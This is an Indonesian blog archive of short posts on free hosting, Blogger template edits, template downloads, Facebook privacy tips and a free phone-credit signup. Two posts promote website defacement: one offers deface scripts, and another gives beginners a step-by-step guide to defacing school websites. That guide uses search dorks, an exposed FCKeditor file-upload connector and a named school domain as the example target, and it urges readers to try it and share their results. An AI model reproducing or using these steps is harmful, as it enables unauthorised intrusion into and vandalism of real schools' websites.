Web Hosting Gratis Terbaik Indonesia

Unknown Thursday, October 17, 2013 1
Semakin berkembangnya teknologi yang ada di Indonesia, ternyata semakin banyak generasi mudah yang berkreasi. Yaitu dengan membangun web hosting, yang dimana tempat fasilitas untuk membuat blog, forum, radio, dan lain lain yang dilengkapi dengan domain.



Untuk itu kita juga harus tau web hosting yang dibangun oleh generasi muda Indonesia. Tapi kali ini saya akan share web hosting yang gratisan



IDHOSTINGER

4 Daftar Web hosting Gratis Terbaik

Berikut adalah fitur yang diberikan oleh mereka : 
  • 2GB Space, 100GB Bandwidth
  • Memiliki Auto Installer
  • Unlimited Domain
  • NGINX Webserver



CLOUDNESIA


4 Daftar Web hosting Gratis Terbaik

  • Berikut adalah fitur yang diberikan oleh mereka :
    • Space 200Mb
    • Cpanel
    • Fantastico Installer
    • 2 MySQL Database
     

MEGABYTE


4 Daftar Web hosting Gratis Terbaik

Berikut adalah fitur yang diberikan oleh mereka :
  • Control Panel cPanel v11
  • Storage 1,6GB
  • Bandwidth 150GB
  • 3 mySQL database
  • 6 Add On Domain 

Itu saja web hosting yang saya ketahui sob.. jika ada yang ingin menambahkan silahkan tulis dikomentar.

Semoga bermanfaat ^_^

Cara Menghilangkan Langganan : Poskan Komentar (Atom) Pada Blog

Unknown Wednesday, October 16, 2013 2
Pada postingan sebelumnya saya membagikan Cara Menghilangkan Langganan : Entri (Atom) Pada Blog. Sekarang juga hampir sama, yaitu sesuai dengan judul diatas Cara Menghilangkan Langganan : Poskan Komentar (Atom).



Sebenarnya Langganan Poskan Komentar adalah fasilitas untuk blogger sebagai untuk komentar-komentar yang ada pada artikel tersebut. Tapi biar kelihatan rapi, sebaiknya dihilangkan.

1. Login ke Blogger dulu sob. Kemudian menuju Dasbor

Lalu klik Template, kemudian pilih Edit HTML

2. Cari kode dibawah ini, untuk memudahkan mencarinya tekan Ctrl + F pada keyboard

<div class='feed-links'>
<data:feedLinksMsg/>
<b:loop values='data:links' var='f'>
<a class='feed-link' expr:href='data:f.url' expr:type='data:f.mimeType' target='_blank'><data:f.name/> (<data:f.feedType/>)</a>
</b:loop>
</div>

3. Setelah ketemu, tinggal hapus tuh kode nya.. biar tulisannya hilang

Selesai, silahkan mencoba ^_^

Kumpulan Situs Penyedia Blog Gratis

Unknown Wednesday, October 16, 2013 0

Tentunya para Blogger sudah tau macam-macam penyedia blog gratis. Tapi kali ini hanya sekedar pengetahuan untuk para blogger, dan ternyata situs penyedia blog bukan hanya Blogger dan Wordpress.


Penyedia blog memberi kesempatan para blogger untuk berbagi pengetahuan dan bertukar pikiran. Seperti memberikan tutorial, memposting kata-kata motivasi, berbagi pengetahuan, dan masih banyak lagi. Pokoknya kita bebs mau apain blog tersebut sob.


Hehehe.. males ngetik nih. Langsung saja kita coba satu-satu gan.. ke TKP ^_^






Mungkin diantara teman-teman yang ingin menambahkan, silahkan berkomentar dibawah..

Semoga bermanfaat ^_^

Kumpulan Template Blog Keren SEO Friendly

Unknown Wednesday, October 16, 2013 2
Pada postingan sebelumnya saya memagikan 3 Template Facebook Keren Untuk Blog, dan kali ini saya ingin membagikan templat lagi untuk para SEO.



Karena saya males ngetik, langsung saja ke TKP

NB : Jika anda dialihkan ke Adf.ly silahkan tunggu 5 detik, lalu Skip


Template Super SEO

live demo


Template Super Master

live demo


Template SEO 2 Columns

live demo


Template SEO 3 Columns

live demo


Selamat mencoba sob.. semoga bermanfaat ^_^

Jika ada waktu luang, akan saya tambahkan lagi templatenya...

Cara Menghilangkan Langganan : Entri (Atom) Pada Blog

Unknown Wednesday, October 16, 2013 0
Dalam sebuah blog yang lebih tepatnya pada layanan Blogger.com, pasti terdapat embel-embel Langganan : Entri (Atom). Biar blog terlihat rapi sebaiknya embel-embelnya disembunyikan atau dihapus. Sebenarnya itu sangat berfungsi pada blog, karena untuk berlangganan artikel atau postingan yang kita terbitkan pada blog.



Tapi yang disediakan Blogger.com sangat sederhana sekali, sehingga banyak blogger menggunakan fasilitas FeedBurner.com.

Untuk teman-teman yang ingin menghilangkan Langganan : Entri (Atom), langsung saja disimak gan.

1. Pertama sobat kudu Masuk ke Blogger dulu, kemudian menuju Dasbor blog

2. Lalu klik Template, dan pilih Edit HTML

3. Cari kode seperti dibawah ini

<b:include data='feedLinks' name='feedLinksBody'/>

Untuk memudahkan mencarinya, tekan Ctrl + F pada keyboard lalu copy dan paste kan kode diatas

4. Jika sudah ketemu, lalu hapus kode yang diatas dan Simpan Template. Selesai...

Lihat blognya.. selamat mencoba ^_^

Cara Mudah Mengintip HTML Template Blog Orang Lain

Unknown Wednesday, October 16, 2013 0


Sesuai pada judul postingan diatas yaitu, Cara Mudah Mengintip HTML Template Blog Orang Lain. Pastinya teman-teman juga pernah terlintas pertanyaan. 

"Gimana sih biar template blog gue mirip dengan blog itu ?"

Begini gan caranya, mudah kok dan simple banget. Sobat bisa ngintip HTML nya secara keseluruhan dengan tekan Ctrl + U pada keyboard atau juga bisa klik kanan pada blog yang ingin di intip templatenya, lalu pilih View Page Source.

Makan akan muncul tab baru yang memperlihatkan isi Template termasuk kode HTML nya, dan teman-teman juga bebas mau lihat apa yang ada didalamnya.

Sampai disini dulu ya sob.. semoga tutorial ini bermanfaat

Maaf jika terlalu singkat sob

3 Template Facebook Keren Untuk Blog

Unknown Tuesday, October 15, 2013 0
3 Template ini aku dapatkan dari situs penyedia Template yaitu Blogger Templates. Ya pada saat itu aku sedang berkunjung disitu mencari Template, nah kan ada kolom search engine untuk mencari template yang di ingin kan. Akhirnya setelah ngetik tulisan "facebook" muncul 3 tempate yang mirip facebook.



3 Template tersebut namanya Facebook Lover, Facebook 2.0 dan Facebooked

NB : Jika anda dialihkan ke Adf.ly silahkan tunggu 5 detik, lalu Skip



Template Facebook Lover

live demo





Template Facebook 2.0

live demo





Template Facebooked

live demo


NB : Jika anda dialihkan ke Adf.ly silahkan tunggu 5 detik, lalu Skip

Semoga template nya bermanfaat dan bisa membuat blog sobat semakin menarik..

Cara Menghilangkan Powered by Blogger

Unknown Tuesday, October 15, 2013 0
Powered by Blogger sering kita jumpai di layanan Blogger.com, sebagian para blogger pemula atau newbie seperti saya merasa bingung dengan Atribut ini. Bingung gimana ? Ya, gimana cara menghilangkan Powered by Blogger ini gan atau cara menyembunyikannya. Sebenarnya atribut itu juga tidak menggannggu pada blog kok, itu hanya hak cipta yang diberikan Blogger. 



Tapi ada juga para blogger yang kadang sudah tidak memerlukan atribut ini di blognya, maka lebih baik menyembunyikannya atau menghilangkannya saja.

Ikuti caranya dibawah ini,

Pertama masuk Dashboard blog dulu pastinya sob

Lalu pilih Template, kemudian Edit HTML

Cari kode ]]></b:skin>, untuk lebih cepat mencarinya tekan Ctrl + F pada keyboard

Kemudian letakkan kode dibawah ini tepat di atas ]]></b:skin>

#Attribution1 {
height:0px;
visibility:hidden;
display:none
}

Klik tombol Save, akhirnya selesai juga..

Sekarang lihat tampilan blognya, selamat mencoba

Cara Melindungi Akun Facebook Dari Serangan Hacker

Unknown Tuesday, October 08, 2013 0
Pada kesempatan kali ini saya akan share Cara Melindungi Akun Facebook Dari Serangan Hacker. Mengapa saya membagikan tutorial ini ?. Karena teman sekolah saya lagi dibajak akun facebooknya, lalu di bertanya ke saya. Bagaimana cara meindungi facebook dari Hacker ?



Dan pada kali ini saya akan share pengalaman tentang keamanan itu sob. Oke langsung saja kita bahas bersama-sama..

Sembunyikan Email

Dengan menyembunyikan email, si hacker mungkin akan kesulitan menemukan identitas sobat. Tapi biasanya jika hackernya sudah master walaupun tidak memakai email sudah tau.

Sembunyikan Nomor Telepon

Ini nih biasanya hacker dengan meminjam hape yang punya facebook yang di dalamnya ada nomor penting untuk konfirmasi facebook.

Atur Privasi Facebook

Aturlah privasi facebook sobat ke hanya Teman jangan dibuat Publik.

Mungkin ini yang bisa saya bagikan sob, jika ada kekurangan harap maklum lah..

Kumpulan Script Buat Deface Website

Unknown Monday, October 07, 2013 0

Kembali bersama Sofyan yang membawakan artikel yang lain daripada yang lain. Yaitu, Kumpulan Script Buat Deface Website. Mungkin diantara teman-teman sudah banyak yang tau cara membuat Script ini. Dan kali ini sobat tinggal download saja, lalu di edit sendiri sesuka sobat.

Oke, langsung saja kita lihat scriptnya dibawah ini.. Jangan kaget ya kalo jelek, hehehe :'D


Screenshot


NB : Untuk lebih cepat simpan scriptnya.. Sobat bisa klik DEMO nya lalu klik tombol Ctrl + U

Otomatis scriptnya akan terlihat semua, lalu klik Ctrl + S ke format HTML.

Untuk script yang lainnya menyusul ya sob..

Cara Deface Website Sekolah Bagi Pemula

Unknown Sunday, October 06, 2013 0
Nah, kali ini saya akan membagikan tutorial yang paling digemari oleh Cyber Crime sob. Mungkin diantara teman-teman sudah banyak yang tau Deface Website, yaitu dengan mengubah tampilan website tersebut.



Dan pada kali ini saya akan memberikan Cara Deface Website Sekolah Bagi Pemula dengan domain Sch.Id, oke langsung saja kita mulai tutorialnya ya sob...

1. Pertama-tama siapkan dulu Script untuk Deface sob

2. Kemudian pasang Dork ini di Search Engine sobat

inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

Pilih salah satu Dork diatas, sebagai contoh

inurl:/html/siswa.php?

Lalu copy dan paste kan di Search Engine untuk mencari Website Sekolah yang Vuln

Klik gambar untuk memperjelas


3. Jika sudah ketemu kita pilih salah satu Websitenya, sebagai contoh

Website, www.sman1kotabaru.sch.id

4. Kita siapkan

Exploit: /editor/filemanager/connectors/test.html

Jadi, www.sman1kotabaru.sch.id/editor/filemanager/connectors/test.html


Seperti ini gambarnya
5. Ubah Connector ASP ke PHP

Untuk Scriptnya kita ambil saja file.txt gan, sobat buat dulu filenya di Notepad terserah mau nulis apa saja.


6. Kemudian Upload fil.txt yang di buat tadi, untuk melihat hasilnya Deface tadi

Beri embel-embel /userfiles/file/namafile.txt di website tadi

Jadi, www.sman1kotabaru.sch.id/userfiles/file/namafile.txt

Ganti nama namafile.txt dengan file.txt yang sobat buat tadi

Misal www.sman1kotabaru.sch.id/userfiles/file/sofyanpublish.txt



Ini dia hasilnya

Ini hasil dari tutorial ini,


Selamat mencoba, jika sudah berhasil bagikan tutorial ini kepada teman-teman semua

Jangan lupa bagi hasilnya di komentar ya gan

Cara Mudah Mendapatkan Pulsa Gratis All Operator

Unknown Friday, October 04, 2013 0
Kali ini sofyan akan berbagi seputar tutorial Cara Mudah Mendapatkan Pulsa Gratis All Operator. Ternyata banyak sekali cara mendapatkan pulsa gratis dari internet, ya salah satunya dari situs mCent



Bagaimana caranya mendapatkan pulsa gratis dari mCent ?

Untuk caranya silahkan ikuti tutorial dibawah ini, pastinya sobat kudu daftar dulu di mCent.

Pertama sobat masuk DISINI untuk daftar.

Kemudian masukkan nomer hape sobat, harus diawali kode negara. Untuk indonesia kode nya (62), misal 6281217xxxxxx.

Lalu sobat disuruh untuk memasukan kode konfirmasi yang dikirim ke nomer hape sobat. Tunggu sebentar hingga kode nya terkirim ke hape yang sobat daftarkan tadi.

Jika kode konfirmasi sudah diterima, silahkan masukkan kode nya di kolom tadi. Lalu isi semua data-data yang diminta. Misal email dan password.

Pendaftaran di mCent sudah selesai. Selamat mencoba, silahkan DAFTAR DISINI